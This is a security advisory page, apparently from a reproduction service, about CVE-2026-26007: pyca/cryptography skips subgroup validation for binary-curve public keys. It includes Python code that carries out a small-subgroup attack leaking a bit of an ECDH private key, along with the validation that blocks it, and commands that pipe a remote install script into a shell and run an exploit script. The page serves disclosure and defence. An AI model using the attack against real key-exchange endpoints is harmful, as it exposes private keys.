REPRO-2026-00089 | Severity: HIGH | Verified
pyca/cryptography SECT curve public key parsing lacks subgroup validation, enabling small-subgroup attacks that leak ECDH private key bits and allow ECDSA signature forgery.
Feb 15, 2026
What's the vulnerability?
When pyca/cryptography parses a public key on a binary (SECT) curve it does not check that the point lies in the prime-order subgroup generated by the base point, i.e. it never verifies n*Q = O. Every SEC 2 binary curve has a cofactor h > 1, so a peer can supply a point that is on the curve but carries a small-order component T. In ECDH the victim's scalar multiplication then returns d*Q + (d mod ord(T))*T instead of d*Q, which leaks private key bits; the same missing check allows ECDSA signature forgery. Tracked as CVE-2026-26007 and GHSA-R6PH-V2QM-Q3C2.
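The missing check and its consequence, as an added example (this is neither pyca/cryptography's code nor Pruva's reproduction script): a minimal sect163k1 implementation in plain Python, the SEC 1 public-key validation that includes the subgroup test n*Q = O, and the one-bit ECDH leak an attacker obtains from a victim that skips it. The curve constants are the published sect163k1 (NIST K-163) domain parameters; the function names, the test scalar, and the simplified ECDH (raw d*Q with no key derivation, not constant time) are assumptions made here for illustration. It does not demonstrate the ECDSA forgery side of the advisory.

```python
# Added example, not pyca/cryptography code: textbook affine arithmetic on
# sect163k1 (NIST K-163) over GF(2^163), the SEC 1 subgroup check the advisory
# says is skipped, and the one-bit ECDH leak that skipping it permits.
M = 163                                               # field degree
F = (1 << 163) | (1 << 7) | (1 << 6) | (1 << 3) | 1   # x^163 + x^7 + x^6 + x^3 + 1
A, B = 1, 1                                           # y^2 + xy = x^3 + a*x^2 + b
G = (0x02FE13C0537BBC11ACAA07D793DE4E6D5E5C94EEE8,    # base point, published value
     0x0289070FB05D38FF58321F2E800536D538CCDAA3D9)
N = 0x04000000000000000000020108A2E0CC0D99F8A5EF      # prime order of G; #E = 2*N
INF = None                                            # point at infinity

def f_mul(a, b):
    """GF(2^163) multiply: carry-less product, reduced by F as it grows."""
    r = 0
    while b:
        if b & 1:
            r ^= a
        b >>= 1
        a <<= 1
        if (a >> M) & 1:
            a ^= F
    return r

def f_inv(a):
    """Inverse of a nonzero GF(2^163) element: extended Euclid on polynomials."""
    u, v, g1, g2 = a, F, 1, 0
    while u != 1:
        j = u.bit_length() - v.bit_length()
        if j < 0:
            u, v, g1, g2, j = v, u, g2, g1, -j
        u ^= v << j
        g1 ^= g2 << j
    return g1

def f_sqrt(c):
    for _ in range(M - 1):            # sqrt(c) = c^(2^(m-1)): square m-1 times
        c = f_mul(c, c)
    return c

def is_on_curve(P):
    if P is INF:
        return True
    x, y = P
    x2 = f_mul(x, x)
    return (0 <= x < 1 << M and 0 <= y < 1 << M
            and f_mul(y, y) ^ f_mul(x, y) == f_mul(x2, x) ^ f_mul(A, x2) ^ B)

def p_double(P):
    if P is INF or P[0] == 0:         # x = 0 is the unique point of order 2
        return INF
    x1, y1 = P
    lam = x1 ^ f_mul(y1, f_inv(x1))
    x3 = f_mul(lam, lam) ^ lam ^ A
    return (x3, f_mul(x1, x1) ^ f_mul(lam ^ 1, x3))

def p_add(P, Q):
    if P is INF or Q is INF:
        return Q if P is INF else P
    (x1, y1), (x2, y2) = P, Q
    if x1 == x2:                      # Q is P, or -P = (x1, x1 + y1)
        return p_double(P) if y1 == y2 else INF
    lam = f_mul(y1 ^ y2, f_inv(x1 ^ x2))
    x3 = f_mul(lam, lam) ^ lam ^ x1 ^ x2 ^ A
    return (x3, f_mul(lam, x1 ^ x3) ^ x3 ^ y1)

def p_mul(k, P):                      # double-and-add, not constant time
    R = INF
    while k:
        if k & 1:
            R = p_add(R, P)
        P, k = p_double(P), k >> 1
    return R

def order_two_point():
    """P = -P forces x = 0 (since -(x, y) = (x, x + y)); then y^2 = b."""
    return (0, f_sqrt(B))

def validate_public_key(Q):
    """SEC 1 v2 3.2.2.1: Q != O, coordinates in field, on curve, and n*Q == O."""
    return Q is not INF and is_on_curve(Q) and p_mul(N, Q) is INF

def ecdh(d, peer_pub, validate):
    """Victim side; validate=False is the behaviour the advisory describes."""
    if validate and not validate_public_key(peer_pub):
        raise ValueError("peer public key is not in the prime-order subgroup")
    return p_mul(d, peer_pub)

def recover_low_bit(victim_pub, shared):
    """Attacker sent G + T, so the victim computed d*G + (d mod 2)*T; compare."""
    if shared == victim_pub:
        return 0
    if shared == p_add(victim_pub, order_two_point()):
        return 1
    raise ValueError("shared secret matches neither candidate")

def attack(d, validate=False):
    """Leak the low bit of the victim's static scalar d (raises if it validates)."""
    malicious = p_add(G, order_two_point())   # on the curve but not in <G>
    return recover_low_bit(p_mul(d, G), ecdh(d, malicious, validate))
```

T = (0, sqrt(b)) is the unique point of order 2 on a binary curve (for sect163k1 it is (0, 1)). The point G + T lies on the curve and passes a bare cofactor test 2*Q != O, but fails n*Q = O; a victim that multiplies it by a static scalar d returns d*G + (d mod 2)*T, and the attacker, who already knows the victim's public key d*G, learns d mod 2 by comparing the two candidates. With cofactor 2 that is one bit per static key; on the SECT curves with cofactor 4 a point of order 4 gives d mod 4. Full validation as in validate_public_key, or cofactor multiplication (computing h*d*Q), removes the dependence on the peer's choice of coset.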
Root Cause Analysis
Variant Analysis
Bypass and alternate trigger exploration (if present).
One Command
Verify with pruva-verify
Run the Pruva CLI to automatically fetch and execute the reproduction script. Any of the three identifiers selects this reproduction:
    pruva-verify REPRO-2026-00089
    pruva-verify GHSA-R6PH-V2QM-Q3C2
    pruva-verify CVE-2026-26007
Install the CLI:
    curl -fsSL https://pruva.dev/install.sh | sh
Or Run Manually
1. Download the script
    curl -O https://pruva.dev/api/v1/reproductions/REPRO-2026-00089/artifacts/repro/reproduction_steps.sh
2. Make it executable
    chmod +x reproduction_steps.sh
3. Run the script
    ./reproduction_steps.sh
Run in a VM, container, or disposable environment. This exploits a real vulnerability.
How Pruva Reproduced This
Watch the AI agent's step-by-step process.
Artifacts
repro/rca_report.md (2.7 KB)
repro/reproduction_steps.sh (1.6 KB)
vuln_variant/rca_report.md (4.4 KB)
vuln_variant/reproduction_steps.sh (3.0 KB)
bundle/ticket.md (2.1 KB)
logs/repro_output.txt (0.3 KB)
logs/pip_install.txt (0.4 KB)
vuln_variant/patch_analysis.md (1.3 KB)
logs/variant_attempts.txt (1.0 KB)
logs/variant_pip_install.txt (0.4 KB)